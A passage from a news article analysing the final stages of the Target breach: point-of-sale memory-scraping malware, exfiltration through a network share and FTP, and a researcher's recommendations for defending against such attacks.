Step 9: Install Malware. Steal 40 Million Credit Cards
The PoS system was probably not an initial target of the attackers, Be'ery says. It was only when they were unable to access credit card data on the servers they had accessed that they focused on the PoS machines as a contingency. Using the intel garnered during step four and the remote execution capabilities garnered during step seven, the attackers installed the Kaptoxa (pronounced "Kar-toe-sha") on the PoS machines. The malware was used to scan the memory of infected machines and save any credit cards found to a local file.
This step, Be'ery notes, is the only one in which the attackers seem to have used custom-written malware rather than common IT tools.
"Having antivirus would not help you in this case," he says. "When the stakes are so high, with profit in the tens of millions of dollars, they don't care about the cost of creating tailor-made tools."
Step 10: Send Stolen Data via Network Share
Once the malware obtained the credit card data, it created a remote file share on a remote, FTP-enabled machine using a Windows command and the Domain Admin credentials. It would periodically copy its local file to the remote share.
Again, Be'ery notes, these activities would have been authorized against Activity Directory, making it aware of the activity.
Step 11: Send Stolen Data via FTP
Finally, once the data arrived on the FTP-enabled machine, a script was used to send the file to the attackers' controlled FTP accounting using the Windows internal FTP client.
"The initial penetration point is not the story, because eventually you have to assume you're going to get breached," Be'ery says. "You cannot assume otherwise. You have to be prepared and have an incident response plan for what to do when you are breached. The real problem arises when malware is able to enable an attacker to penetrate deeper into the network."
"If you have the right visibility, that activity really stands out," he adds.
How to Protect Your Organization
Be'ery recommends that organizations take the following steps to protect themselves:
- Harden access controls. Monitor and profile access patterns to systems to identify abnormal and rogue access patterns. Where possible, use multi-factor authentication to sensitive systems to reduce risks associated with theft of credentials. Segregate networks, limit allowed protocols usage and limit users' excessive privileges.
- Monitor users' lists for the addition of new users, especially privileged ones.
- Monitor for signs of reconnaissance and information gathering. Pay special attention to excessive and abnormal LDAP queries.
- For sensitive, single-purpose servers, consider whitelisting of allowed programs.
- Don't rely on anti-malware solutions as a primary mitigation measure since attackers mostly leverage legitimate IT tools.
- Place security and monitoring controls around Active Directory as it is involved in nearly all stages of the attack.
- Participate in Information Sharing and Analysis Center (ISAC) and Cyber Intelligence Sharing Center (CISC) groups to gain valuable intelligence on attackers' Tactics, Techniques and Procedures (TTPs).
Sign up for CIO Asia eNewsletters.